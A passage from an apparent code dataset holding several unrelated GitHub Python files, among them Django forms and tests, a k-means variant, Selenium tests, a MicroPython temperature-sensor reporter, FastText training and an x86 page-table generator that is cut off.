staffs=[]):\n self.name = name\n self.staffs = staffs\n def add(self, staff_name):\n self.staffs.append(staff_name)\n def remove(self, staff_name):\n self.staffs.remove(staff_name)\n\nif __name__ == \"__main__\":\n a = 1\n b = 2\n c = add(a, b)\n print(\"{},{}\".format(a,b))\n print(c)\n '''\n 1,2\n 3\n '''\n\n a = [1, 2]\n b = [3, 4]\n c = add(a, b)\n print(\"{},{}\".format(a, b))\n print(c)\n '''\n [1, 2, 3, 4],[3, 4]\n [1, 2, 3, 4]\n '''\n\n a = (1, 2)\n b = (3, 4)\n c = add(a, b)\n print(\"{},{}\".format(a, b))\n print(c)\n '''\n (1, 2),(3, 4)\n (1, 2, 3, 4)\n '''\n\n com1 = Company(\"com1\", [\"bobby1\", \"bobby2\", \"bobby3\"])\n com1.add(\"bobby4\")\n com1.remove(\"bobby1\")\n print(com1.staffs)\n # ['bobby2', 'bobby3', 'bobby4']\n\n com2 = Company(\"com2\")\n com2.add(\"bobby\")\n print(com2.staffs)\n # ['bobby']\n\n com3 = Company(\"com3\")\n com3.add(\"bobby5\")\n print(com2.staffs)\n print(com3.staffs)\n # ['bobby', 'bobby5']\n # ['bobby', 'bobby5']\n print(com2.staffs is com3.staffs)\n\n # com2和com3使用了默认的list,list属于可变对象,此时com2和com3共用一个list\n print(Company.__init__.__defaults__)\n # (['bobby', 'bobby5'],)\n # 结论:尽量不要将list作为函数参数传入","repo_name":"Echo002/AdvancePython","sub_path":"chapter06/an_error.py","file_name":"an_error.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73947969809","text":"from django import forms\nfrom django.forms import ModelForm\n\nfrom inoks.models.Brand import Brand\n\n\nclass BrandForm(ModelForm):\n\n class Meta:\n model = Brand\n fields = ('name',)\n widgets = {\n 'name': forms.TextInput(\n attrs={'class': 'form-control ', 'placeholder': 'Ürün Markası', 'required': 'required'})\n\n\n }\n","repo_name":"furkanyalcindag/oxit-b2b","sub_path":"inoks/Forms/BrandForm.py","file_name":"BrandForm.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37499841841","text":"from django.test import TestCase\nfrom unittest.mock import MagicMock, patch\n\nfrom django.http import HttpResponseBadRequest\nfrom django.forms.fields import CharField\n\nfrom palautteet.email import EmailService\nfrom palautteet.forms import ContactsForm\nfrom palautteet.views import submit_form\n\n\nclass TestEmail(TestCase):\n def test_message_constructed(self):\n data = dict(foo='bar', fizz='buzz')\n res = EmailService._construct_message(data)\n expected = 'foo:\\nbar\\n\\nfizz:\\nbuzz'\n self.assertEqual(expected, res)\n\n def test_message_empty_fields_discarded(self):\n data = dict(foo='bar', fizz=None)\n res = EmailService._construct_message(data)\n expected = 'foo:\\nbar'\n self.assertEqual(expected, res)\n\n\nclass TestForm(TestCase):\n def test_email_name_at_the_end(self):\n class AContactsForm(ContactsForm):\n myfield = CharField()\n\n instance = AContactsForm()\n self.assertListEqual(['name', 'email'], list(instance.fields.keys())[-2:])\n\n\nclass TestViews(TestCase):\n\n @patch('palautteet.views.render')\n def test_email_gets_sent(self, _):\n form = MagicMock()\n form.is_valid.return_value = True\n request = MagicMock()\n service = MagicMock()\n submit_form(request, form, 'foo', service)\n self.assertTrue(service.send.called)\n\n def test_invalid_form_responses_with_400(self):\n form = MagicMock()\n form.is_valid.return_value = False\n request = MagicMock()\n service = MagicMock()\n res = submit_form(request, form, 'foo', service)\n self.assertIsInstance(res, HttpResponseBadRequest)\n","repo_name":"osakunta/django-sivusto","sub_path":"palautteet/tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72915714129","text":"\"\"\" \n# UGLY NUMBER II\n\nWrite a program to find the n-th ugly number.\n\nUgly numbers are positive numbers whose prime factors only include 2, 3, 5. \n\nExample:\n\nInput: n = 10\nOutput: 12\nExplanation: 1, 2, 3, 4, 5, 6, 8, 9, 10, 12 is the sequence of the first 10 ugly numbers.\nNote: \n\n1 is typically treated as an ugly number.\nn does not exceed 1690. \n\"\"\"\n\nclass Solution:\n def nthUglyNumber(self, n: int) -> int:\n \n result = [1] * n\n i2 = 0\n i3 = 0\n i5 = 0\n \n next2 = 2\n next3 = 3\n next5 = 5\n \n for i in range(1, n):\n result[i] = min(next2, next3, next5)\n \n if result[i] == next2:\n i2 += 1\n next2 = result[i2] * 2\n \n if result[i] == next3:\n i3 += 1\n next3 = result[i3] * 3\n \n if result[i] == next5:\n i5 += 1\n next5 = result[i5] * 5\n \n return result[-1]","repo_name":"das-jishu/data-structures-basics-leetcode","sub_path":"Leetcode/medium/ugly-number-II.py","file_name":"ugly-number-II.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"66"} +{"seq_id":"20492053077","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 27 21:35:42 2019\r\n\r\n@author: Administrator\r\n\"\"\"\r\nimport numpy as np\r\nfrom center_method import *\r\nfrom line_three import *\r\nfrom distance_method import *\r\n\r\ndef get_cen_sqrt(data):\r\n k = np.shape(data)[0]\r\n cen = np.ones((k, k)) * np.inf\r\n for i in range(k):\r\n for j in range(i + 1, k):\r\n cen[i, j] = np.linalg.norm(data[i, :] - data[j, :]) / 2\r\n for i in range(1, k):\r\n for j in range(0, i ):\r\n cen[i, j] = cen[j, i]\r\n return cen\r\n\r\ndef point_all_center(x, c, b, d = euclidean):\r\n # temp = d(x, c, 1)\r\n temp = np.linalg.norm(x - c, axis = 1)\r\n arg = temp.argsort()\r\n index = arg[0]\r\n low_index = arg[1:b+1]\r\n table = temp[arg[0]]\r\n low = temp[arg[1:b+1]]\r\n return index, (table), (low), low_index\r\ndef point_partial_center(x, c, y, a, d = euclidean):\r\n comb = np.hstack((y, a))\r\n b = np.size(comb)\r\n temp = np.linalg.norm(x - c[comb, :], axis=1)\r\n # temp = np.sqrt(d(x, c[comb, :], 1))\r\n arg = temp.argsort()\r\n index = comb[arg[0]]\r\n low_index = comb[arg[1:b]]\r\n table = temp[arg[0]]\r\n low = temp[arg[1:b]]\r\n return index, table, low, low_index\r\n\r\n\r\ndef drake(data, k, center, max_iteration = 200):\r\n row = np.shape(data)[0]\r\n table = np.zeros((row))#high\r\n index = np.zeros((row), int)\r\n cen_sum = np.zeros(np.shape(center))\r\n cen_num = np.zeros((k))\r\n total = 1\r\n b = int(np.ceil(k/4))\r\n low = np.zeros((row, b))\r\n low_index = np.zeros((row, b), int)\r\n for i in range(row):\r\n index[i], table[i], low[i, :], low_index[i, :] = point_all_center(data[i, :], center, b)\r\n cen_sum[index[i], :] += data[i, :]\r\n cen_num[index[i]] += 1\r\n p = np.zeros(k)\r\n count = row * k\r\n cluster_changed = True\r\n while cluster_changed and total < max_iteration:\r\n for i in range(k):\r\n temp = center[i, :].copy()\r\n # if cen_num[i] == 0:\r\n # print('*' * 10 + 'fail' + '*' * 10)\r\n # return -1, -1\r\n # else:\r\n if cen_num[i] != 0:\r\n center[i, :] = cen_sum[i, :] / cen_num[i]\r\n p[i] = np.linalg.norm(center[i, :] - temp)\r\n first = np.max(p)\r\n cluster_changed = False\r\n # print('这是Drake的第', total, '次迭代')\r\n total += 1\r\n s = get_cen_sqrt(center).min(1)\r\n m = -1\r\n for i in range(row):\r\n table[i] += p[index[i]]\r\n low[i, b - 1] -= first\r\n for z in range(b - 2, -1, -1):\r\n low[i, z] = np.min((low[i, z] - p[low_index[i, z]], low[i, z + 1])) #propagate,\r\n if table[i] > s[index[i]] :\r\n temp = index[i]\r\n flag = True\r\n for z in range(b):\r\n if table[i] <= low[i, z]:\r\n flag = False \r\n if z > 0:\r\n index[i], table[i], low[i, :z], low_index[i, :z] = point_partial_center(data[i, :], center, index[i], low_index[i, :z]) #为何我用z+1就有误差了?\r\n count += z\r\n break\r\n if flag:\r\n index[i], table[i], low[i, :b], low_index[i, :b] = point_all_center(data[i, :], center, b)\r\n count += k\r\n if temp != index[i]:\r\n cluster_changed = True\r\n cen_num[temp] -= 1\r\n cen_num[index[i]] += 1\r\n cen_sum[temp, :] -= data[i, :]\r\n cen_sum[index[i], :] += data[i, :]\r\n m = max(m, z+1)\r\n b = max(int(np.ceil(k/8)), m)\r\n table = np.linalg.norm(data - center[index[:], :], axis = 1) ** 2\r\n count += row\r\n print(total)\r\n return index, table, count\r\n\r\nfrom harmerly_triangle import hamerly_sqrt\r\nfrom k_means import naive_k_means\r\nfrom elkan_triangle import elkan_sqrt\r\nimport time\r\nfrom center_method import plus_triangle\r\nfrom box_kdtree import kdtree_kmeans\r\nif __name__ == '__main__':\r\n# data = np.load('iris.npy')\r\n# data = np.load('birch_data.npy')\r\n t =[]\r\n # dim = [2,4,8,16,32,64]\r\n # kk = [2,4,6, 8,12, 16,22, 32,64,128, 256, 512]\r\n # kk = [128, 148, 168, 188, 208, 238, 268, 298,356, 400]\r\n # kk = [12,17,22, 27,32,37]\r\n # kk = [2,3,4,5,6, 7,8,9,10]\r\n # kk = [4,8,16,32,64,128]\r\n # kk = [2,4]\r\n k=3\r\n data = np.random.rand(2000,3)\r\n center=plus_triangle(data, k)\r\n # # a = time.process_time()\r\n ii, jj, c1 = drake(data , k, center.copy())\r\n # # b = time.process_time()\r\n i2, j2 = naive_k_means(data, k, center.copy())\r\n print(np.sum(i2 - ii), np.sum(j2)-np.sum(jj))\r\n\r\n # kk=[160, 200, 256, 512]\r\n\r\n#todo all triangle styles\r\n\r\n# count = []\r\n# for dim in kk:\r\n# data = np.random.rand(6800,dim)\r\n# # k = 13\r\n# print(dim,'维了')\r\n# center=plus_triangle(data, k)\r\n#\r\n# a = time.process_time()\r\n# ii, jj, ch, original = hamerly_sqrt(data, k, center.copy())\r\n# b = time.process_time()\r\n# t.append(b - a)\r\n#\r\n# a = time.process_time()\r\n# i1, j1 = naive_k_means(data, k, center.copy())\r\n# b = time.process_time()\r\n# t.append(b - a)\r\n# print(np.sum(i1 - ii), np.sum(j1) - np.sum(jj))\r\n#\r\n# a = time.process_time()\r\n# i2, j2, ce = elkan_sqrt(data, k, center.copy())\r\n# b = time.process_time()\r\n# t.append(b - a)\r\n# print(np.sum(i2 - ii), np.sum(j2) - np.sum(jj))\r\n#\r\n# a = time.process_time()\r\n# i3, j3, ctree = kdtree_kmeans(data, k, center.copy(), 50)\r\n# b = time.process_time()\r\n# t.append(b - a)\r\n# print(np.sum(np.abs(i3 - ii)), np.sum(j3) - np.sum(jj))\r\n#\r\n# a = time.process_time()\r\n# i4, j4, cd = drake(data , k, center.copy())\r\n# b = time.process_time()\r\n# t.append(b-a)\r\n# print(np.sum(i4 - ii), np.sum(j4) - np.sum(jj))\r\n#\r\n# count.append(ch)\r\n# count.append(original)\r\n# count.append(ce)\r\n# count.append(ctree)\r\n# count.append(cd)\r\n# # kk=dim\r\n# plt.plot(kk, t[2::5], label='Elkan', c='k',linewidth=2)\r\n# plt.plot(kk, t[1::5], '--',label='standard', c='b',linewidth=2)\r\n# plt.plot(kk, t[0::5], '-+',label='Hamerly', c='r',linewidth=2)\r\n# # plt.plot(kk, t[3::5], '-<',label='kdtree', c='g',linewidth=2)\r\n# plt.plot(kk, t[4::5], '->',label='Drake', c='y',linewidth=2)\r\n# #\r\n# ## plt.plot(kk, s[0::2], label='square', c='k',linewidth=2)\r\n# ## plt.plot(kk, s[1::2], '*',label='sqrt', c='r',linewidth=2)\r\n# ##\r\n# plt.legend()\r\n# plt.grid()\r\n# plt.xlabel('dimensional')\r\n# ## plt.xlabel('number')\r\n# plt.ylabel('distance calculations')\r\n# # plt.ylabel('time')\r\n# plt.show()\r\n\r\n# print(np.sum(i - ii), np.sum(j)-np.sum(jj))\r\n\r\n #\r\n\r\n # i = drake(data , k, center)\r\n\r\n\r\n#[4,8,16,32,64]簇,全,以下均为高斯。\r\n# [10.359375,\r\n# 32.859375,\r\n# 65.59375,\r\n# 2.890625,\r\n# 11.5,\r\n# 40.15625,\r\n# 461.0625,\r\n# 515.71875,\r\n# 25.875,\r\n# 95.625,\r\n# 199.453125,\r\n# 1763.96875,\r\n# 786.765625,\r\n# 87.984375,\r\n# 402.609375,\r\n# 702.640625,\r\n# 7337.625,\r\n# 1769.296875,\r\n# 776.75,\r\n# 940.953125]\r\n\r\n# 2\\4个簇,全\r\n# [12.609375,\r\n# 31.75,\r\n# 54.125,\r\n# 2.9375,\r\n# 11.84375,\r\n# 25.265625,\r\n# 81.015625,\r\n# 140.203125,\r\n# 5.90625,\r\n# 19.859375]\r\n\r\n# [2,4,8,16,32,64,128]簇,少naive\r\n#\r\n# [12.609375,\r\n# 31.75,\r\n# 2.9375,\r\n# 11.84375,\r\n# 25.265625,\r\n# 81.015625,\r\n# 5.90625,\r\n# 19.859375,\r\n# 45.453125,\r\n# 384.0,\r\n# 24.46875,\r\n# 87.890625,\r\n# 92.96875,\r\n# 589.71875,\r\n# 51.25,\r\n# 251.125,\r\n# 285.796875,\r\n# 1272.78125,\r\n# 174.265625,\r\n# 910.796875,\r\n# 475.9375,\r\n# 1794.984375,\r\n# 518.609375,\r\n# 989.671875,\r\n# 927.25,\r\n# 1905.0625,\r\n# 1170.28125,\r\n# 1423.6875]\r\n\r\n #\r\n # plt.plot(kk, t[1::4], label='Elkan', c='k',linewidth=2)\r\n # # plt.plot(kk, t[1::5], '--',label='standard', c='b',linewidth=2)\r\n # plt.plot(kk, t[0::4], '-+',label='Hamerly', c='r',linewidth=2)\r\n # plt.plot(kk, t[2::4], '-<',label='kdtree', c='g',linewidth=2)\r\n # plt.plot(kk, t[3::4], '->',label='Drake', c='y',linewidth=2)\r\n # plt.legend()\r\n # plt.grid()\r\n # plt.xlabel('k')\r\n # ## plt.xlabel('number')\r\n # plt.ylabel('time')\r\n # plt.show()\r\n\r\n\r\n","repo_name":"JiahongWu97/k_means","sub_path":"drake_b.py","file_name":"drake_b.py","file_ext":"py","file_size_in_byte":8485,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"73585952850","text":"import time\n\nimport pytest\n\nfrom pages.basket_page import BasketPage\nfrom pages.product_page import ProductPage\n\n\n@pytest.mark.parametrize('link', ['0', '1', '2', '3', '4', '5', '6',\n pytest.param(\"7\", marks=pytest.mark.xfail),\n '8', '9'])\ndef test_guest_can_add_product_to_basket(browser, link):\n link = f\"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer{link}\"\n page = ProductPage(browser, link)\n # инициализируем Page Object, передаем в конструктор экземпляр драйвера и url адрес\n page.open()\n page.add_product_in_basket()\n\n\n@pytest.mark.skip\ndef test_guest_cant_see_success_message_after_adding_product_to_basket(browser):\n link = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n page = ProductPage(browser, link)\n page.open()\n page.add_product_in_basket()\n page.should_not_be_success_message()\n\n\ndef test_guest_cant_see_success_message(browser):\n link = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n page = ProductPage(browser, link)\n page.open()\n page.should_not_be_success_message()\n\n\n@pytest.mark.skip\ndef test_message_disappeared_after_adding_product_to_basket(browser):\n link = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n page = ProductPage(browser, link)\n page.open()\n page.add_product_in_basket()\n page.success_message_should_be_disappeared()\n\ndef test_guest_should_see_login_link_on_product_page(browser):\n link = \"http://selenium1py.pythonanywhere.com/en-gb/catalogue/the-city-and-the-stars_95/\"\n page = ProductPage(browser, link)\n page.open()\n page.should_be_login_link()\n\ndef test_guest_can_go_to_login_page_from_product_page(browser):\n link = \"http://selenium1py.pythonanywhere.com/en-gb/catalogue/the-city-and-the-stars_95/\"\n page = ProductPage(browser, link)\n page.open()\n page.go_to_login_page()\n\n\ndef test_guest_cant_see_product_in_basket_opened_from_main_page(browser):\n link = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n page = ProductPage(browser, link)\n page.open()\n page.go_to_basket()\n basket = BasketPage(browser, link)\n basket.should_not_be_product_in_basket()\n basket.basket_should_be_empty()\n\n\n","repo_name":"Coriolan8/Finale_project_for_Python","sub_path":"test_product_page.py","file_name":"test_product_page.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35585667293","text":"import machine\nimport network\nimport socket\nimport dht\nimport os\nfrom time import sleep\n\n#Define privacy variable\nssid=''\t\t\t\t#your wifi ssid\nwifikey=''\t\t\t#your wifi key\nposturl=''\t\t\t#needs to be without http://\nd = dht.DHT11(machine.Pin(5)) \t#set the input pin for DHT11 sensor\n\nsta_if = network.WLAN(network.STA_IF)\nsta_if.active(True)\nsta_if.connect(ssid, wifikey)\n\ndef err_log(log):\n\tif os.stat('error.log')[6] > 200000:\n\t\tos.remove('error.log')\n\tstrerror=str(log)\n\tf=open('error.log', 'a')\n\tf.write(strerror+'\\n')\n\tf.close()\n\n\ndef http_get(url):\n\t_, _, host, path = url.split('/', 3)\n\ttry:\n\t\taddr = socket.getaddrinfo(host, 80)[0][-1]\n\texcept OSError as error:\n\t\terr_log(error)\n\ttry:\n\t\ts = socket.socket()\n\t\tconnect = s.connect(addr)\n\t\ts.send(bytes('GET /%s HTTP/1.0\\r\\nHost: %s\\r\\n\\r\\n' % (path, host), 'utf8'))\n\t\tsleep(5)\n\t\ts.close()\n\texcept NameError as error:\n\t\terr_log(error)\n\nwhile True:\n\ttry:\n\t\tif sta_if.isconnected() is False:\n\t\t\tsta_if.connect(ssid, wifikey)\n\t\t\tsleep(5)\n\t\t\td.measure()\n\t\t\thttp_get('http://%s/post.php?temperature=%s&humidity=%s&key=123456' %(posturl, d.temperature(), d.humidity()))\n\t\t\tsleep(300)\n\t\telse:\n\t\t\td.measure()\n\t\t\thttp_get('http://%s/post.php?temperature=%s&humidity=%s&key=123456' %(posturl, d.temperature(), d.humidity()))\n\t\t\tsleep(300)\n\texcept() as error:\n\t\tif KeyboardInterrupt:\n\t\t\tbreak\n\t\telse:\n\t\t\terr_log(error)\n\t\t\tpass\n","repo_name":"adrian-stoica/pythmeter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"12056990634","text":"from gensim.models.fasttext import load_facebook_model\nfrom gensim.models.callbacks import CallbackAny2Vec\nimport pickle\nfrom pathlib import Path\nimport logging\n\nlogging.basicConfig(format=\"%(asctime)s - %(message)s\", datefmt=\"%y-%m-%d %H:%M:%S\")\n\nlogging.warning('Read token file')\nstock_toks = pickle.loads(Path('output/tokens.pickle').read_bytes())\n\nclass callback(CallbackAny2Vec):\n \"\"\"Callback to print loss after each epoch.\"\"\"\n\n def __init__(self):\n self.epoch = 0\n\n def on_epoch_end(self, model):\n loss = model.get_latest_training_loss()\n logging.warning(f\"Loss after epoch {self.epoch}: {loss}\")\n self.epoch += 1\n\nlogging.warning('Load pretrained FastText model')\nmodel = load_facebook_model(Path('../jeszk_moments/hu.szte.w2v.fasttext.bin'))\nlogging.warning('Update vocabulary')\nmodel.build_vocab(stock_toks, update=True)\nmodel.workers = 40\n\nlogging.warning('Train model')\nmodel.train(\n corpus_iterable=stock_toks,\n total_examples=len(stock_toks),\n epochs=model.epochs,\n compute_loss=True,\n callbacks=[callback()],\n)\n\nlogging.warning('Save model')\nmodel.save('output/language_model/stock_language_model')\n\nlogging.warning('FastText training is done')","repo_name":"papsebestyen/huforpred","sub_path":"huforpred/fasttext/train_word_embedding.py","file_name":"train_word_embedding.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26831737619","text":"import sys\nimport array\nimport argparse\nimport ctypes\nimport os\nimport struct\nimport re\nimport textwrap\n\nfrom packaging import version\n\nimport elftools\nfrom elftools.elf.elffile import ELFFile\nfrom elftools.elf.sections import SymbolTableSection\n\nif version.parse(elftools.__version__) < version.parse('0.24'):\n sys.exit(\"pyelftools is out of date, need version 0.24 or later\")\n\n\ndef bit(pos):\n \"\"\"Get value by shifting 1 by pos\"\"\"\n return 1 << pos\n\n\n# Page table entry flags\nFLAG_P = bit(0)\nFLAG_RW = bit(1)\nFLAG_US = bit(2)\nFLAG_CD = bit(4)\nFLAG_SZ = bit(7)\nFLAG_G = bit(8)\nFLAG_XD = bit(63)\n\nFLAG_IGNORED0 = bit(9)\nFLAG_IGNORED1 = bit(10)\nFLAG_IGNORED2 = bit(11)\n\nENTRY_RW = FLAG_RW | FLAG_IGNORED0\nENTRY_US = FLAG_US | FLAG_IGNORED1\nENTRY_XD = FLAG_XD | FLAG_IGNORED2\n\n# PD_LEVEL and PT_LEVEL are used as list index to PtableSet.levels[]\n# to get table from back of list.\nPD_LEVEL = -2\nPT_LEVEL = -1\n\n\ndef debug(text):\n \"\"\"Display verbose debug message\"\"\"\n if not args.verbose:\n return\n sys.stdout.write(os.path.basename(sys.argv[0]) + \": \" + text + \"\\n\")\n\n\ndef verbose(text):\n \"\"\"Display --verbose --verbose message\"\"\"\n if args.verbose and args.verbose > 1:\n sys.stdout.write(os.path.basename(sys.argv[0]) + \": \" + text + \"\\n\")\n\n\ndef error(text):\n \"\"\"Display error message and exit program\"\"\"\n sys.exit(os.path.basename(sys.argv[0]) + \": \" + text)\n\n\ndef align_check(base, size, scope=4096):\n \"\"\"Make sure base and size are page-aligned\"\"\"\n if (base % scope) != 0:\n error(\"unaligned base address %x\" % base)\n if (size % scope) != 0:\n error(\"Unaligned region size 0x%x for base %x\" % (size, base))\n\n\ndef dump_flags(flags):\n \"\"\"Translate page table flags into string\"\"\"\n ret = \"\"\n\n if flags & FLAG_P:\n ret += \"P \"\n\n if flags & FLAG_RW:\n ret += \"RW \"\n\n if flags & FLAG_US:\n ret += \"US \"\n\n if flags & FLAG_G:\n ret += \"G \"\n\n if flags & FLAG_XD:\n ret += \"XD \"\n\n if flags & FLAG_SZ:\n ret += \"SZ \"\n\n if flags & FLAG_CD:\n ret += \"CD \"\n\n return ret.strip()\n\n\ndef round_up(val, align):\n \"\"\"Round up val to the next multiple of align\"\"\"\n return (val + (align - 1)) & (~(align - 1))\n\n\ndef round_down(val, align):\n \"\"\"Round down val to the previous multiple of align\"\"\"\n return val & (~(align - 1))\n\n\n# Hard-coded flags for intermediate paging levels. Permissive, we only control\n# access or set caching properties at leaf levels.\nINT_FLAGS = FLAG_P | FLAG_RW | FLAG_US\n\nclass MMUTable():\n \"\"\"Represents a particular table in a set of page tables, at any level\"\"\"\n\n def __init__(self):\n self.entries = array.array(self.type_code,\n [0 for i in range(self.num_entries)])\n\n def get_binary(self):\n \"\"\"Return a bytearray representation of this table\"\"\"\n # Always little-endian\n ctype = \"<\" + self.type_code\n entry_size = struct.calcsize(ctype)\n ret = bytearray(entry_size * self.num_entries)\n\n for i in range(self.num_entries):\n struct.pack_into(ctype, ret, entry_size * i, self.entries[i])\n return ret\n\n @property\n def supported_flags(self):\n \"\"\"Class property indicating what flag bits are supported\"\"\"\n raise NotImplementedError()\n\n @property\n def addr_shift(self):\n \"\"\"Class property for how much to shift virtual addresses to obtain\n the appropriate index in the table for it\"\"\"\n raise NotImplementedError()\n\n @property\n def addr_mask(self):\n \"\"\"Mask to apply to an individual entry to get the physical address\n mapping\"\"\"\n raise NotImplementedError()\n\n @property\n def type_code(self):\n \"\"\"Struct packing letter code for table entries. Either I for\n 32-bit entries, or Q for PAE/IA-32e\"\"\"\n raise NotImplementedError()\n\n @property\n def num_entries(self):\n \"\"\"Number of entries in the table. Varies by table type and paging\n mode\"\"\"\n raise NotImplementedError()\n\n def entry_index(self, virt_addr):\n \"\"\"Get the index of the entry in this table that corresponds to the\n provided virtual address\"\"\"\n return (virt_addr >> self.addr_shift) & (self.num_entries - 1)\n\n def has_entry(self, virt_addr):\n \"\"\"Indicate whether an entry is present in this table for the provided\n virtual address\"\"\"\n index = self.entry_index(virt_addr)\n\n return (self.entries[index] & FLAG_P) != 0\n\n def lookup(self, virt_addr):\n \"\"\"Look up the physical mapping for a virtual address.\n\n If this is a leaf table, this is the physical address mapping. If not,\n this is the physical address of the next level table\"\"\"\n index = self.entry_index(virt_addr)\n\n return self.entries[index] & self.addr_mask\n\n def map(self, virt_addr, phys_addr, entry_flags):\n \"\"\"For the table entry corresponding to the provided virtual address,\n set the corresponding physical entry in the table. Unsupported flags\n will be filtered out.\n\n If this is a leaf table, this is the physical address mapping. If not,\n this is the physical address of the next level table\"\"\"\n index = self.entry_index(virt_addr)\n\n verbose(\"%s: mapping 0x%x to 0x%x : %s\" %\n (self.__class__.__name__,\n phys_addr, virt_addr, dump_flags(entry_flags)))\n\n self.entries[index] = ((phys_addr & self.addr_mask) |\n (entry_flags & self.supported_flags))\n\n def set_perms(self, virt_addr, entry_flags):\n \"\"\"\"For the table entry corresponding to the provided virtual address,\n update just the flags, leaving the physical mapping alone.\n Unsupported flags will be filtered out.\"\"\"\n index = self.entry_index(virt_addr)\n\n verbose(\"%s: changing perm at 0x%x : %s\" %\n (self.__class__.__name__,\n virt_addr, dump_flags(entry_flags)))\n\n self.entries[index] = ((self.entries[index] & self.addr_mask) |\n (entry_flags & self.supported_flags))\n\n\n# Specific supported table types\nclass Pml4(MMUTable):\n \"\"\"Page mapping level 4 for IA-32e\"\"\"\n addr_shift = 39\n addr_mask = 0x7FFFFFFFFFFFF000\n type_code = 'Q'\n num_entries = 512\n supported_flags = INT_FLAGS\n\nclass Pdpt(MMUTable):\n \"\"\"Page directory pointer table for IA-32e\"\"\"\n addr_shift = 30\n addr_mask = 0x7FFFFFFFFFFFF000\n type_code = 'Q'\n num_entries = 512\n supported_flags = INT_FLAGS | FLAG_SZ | FLAG_CD\n\nclass PdptPAE(Pdpt):\n \"\"\"Page directory pointer table for PAE\"\"\"\n num_entries = 4\n\nclass Pd(MMUTable):\n \"\"\"Page directory for 32-bit\"\"\"\n addr_shift = 22\n addr_mask = 0xFFFFF000\n type_code = 'I'\n num_entries = 1024\n supported_flags = INT_FLAGS | FLAG_SZ | FLAG_CD\n\nclass PdXd(Pd):\n \"\"\"Page directory for either PAE or IA-32e\"\"\"\n addr_shift = 21\n addr_mask = 0x7FFFFFFFFFFFF000\n num_entries = 512\n type_code = 'Q'\n\nclass Pt(MMUTable):\n \"\"\"Page table for 32-bit\"\"\"\n addr_shift = 12\n addr_mask = 0xFFFFF000\n type_code = 'I'\n num_entries = 1024\n supported_flags = (FLAG_P | FLAG_RW | FLAG_US | FLAG_G | FLAG_CD |\n FLAG_IGNORED0 | FLAG_IGNORED1)\n\nclass PtXd(Pt):\n \"\"\"Page table for either PAE or IA-32e\"\"\"\n addr_mask = 0x07FFFFFFFFFFF000\n type_code = 'Q'\n num_entries = 512\n supported_flags = (FLAG_P | FLAG_RW | FLAG_US | FLAG_G | FLAG_XD | FLAG_CD |\n FLAG_IGNORED0 | FLAG_IGNORED1 | FLAG_IGNORED2)\n\n\nclass PtableSet():\n \"\"\"Represents a complete set of page tables for any paging mode\"\"\"\n\n def __init__(self, pages_start):\n \"\"\"Instantiate a set of page tables which will be located in the\n image starting at the provided physical memory location\"\"\"\n self.toplevel = self.levels[0]()\n self.page_pos = pages_start\n\n debug(\"%s starting at physical address 0x%x\" %\n (self.__class__.__name__, self.page_pos))\n\n # Database of page table pages. Maps physical memory address to\n # MMUTable objects, excluding the top-level table which is tracked\n # separately. Starts out empty as we haven't mapped anything and\n # the top-level table is tracked separately.\n self.tables = {}\n\n def get_new_mmutable_addr(self):\n \"\"\"If we need to instantiate a new MMUTable, return a physical\n address location for it\"\"\"\n ret = self.page_pos\n self.page_pos += 4096\n return ret\n\n @property\n def levels(self):\n \"\"\"Class hierarchy of paging levels, with the first entry being\n the toplevel table class, and the last entry always being\n some kind of leaf page table class (Pt or PtXd)\"\"\"\n raise NotImplementedError()\n\n def is_mapped(self, virt_addr, level):\n \"\"\"\n Return True if virt_addr has already been mapped.\n\n level_from_last == 0 only searches leaf level page tables.\n level_from_last == 1 searches both page directories and page tables.\n\n \"\"\"\n table = self.toplevel\n num_levels = len(self.levels) + level + 1\n has_mapping = False\n\n # Create and link up intermediate tables if necessary\n for depth in range(0, num_levels):\n # Create child table if needed\n if table.has_entry(virt_addr):\n if depth == num_levels:\n has_mapping = True\n else:\n table = self.tables[table.lookup(virt_addr)]\n\n if has_mapping:\n # pylint doesn't like break in the above if-block\n break\n\n return has_mapping\n\n def is_region_mapped(self, virt_base, size, level=PT_LEVEL):\n \"\"\"Find out if a region has been mapped\"\"\"\n align_check(virt_base, size)\n for vaddr in range(virt_base, virt_base + size, 4096):\n if self.is_mapped(vaddr, level):\n return True\n\n return False\n\n def new_child_table(self, table, virt_addr, depth):\n \"\"\"Create a new child table\"\"\"\n new_table_addr = self.get_new_mmutable_addr()\n new_table = self.levels[depth]()\n debug(\"new %s at physical addr 0x%x\"\n % (self.levels[depth].__name__, new_table_addr))\n self.tables[new_table_addr] = new_table\n table.map(virt_addr, new_table_addr, INT_FLAGS)\n\n return new_table\n\n def map_page(self, virt_addr, phys_addr, flags, reserve, level=PT_LEVEL):\n \"\"\"Map a virtual address to a physical address in the page tables,\n with provided access flags\"\"\"\n table = self.toplevel\n\n num_levels = len(self.levels) + level + 1\n\n # Create and link up intermediate tables if necessary\n for depth in range(1, num_levels):\n # Create child table if needed\n if not table.has_entry(virt_addr):\n table = self.new_child_table(table, virt_addr, depth)\n else:\n table = 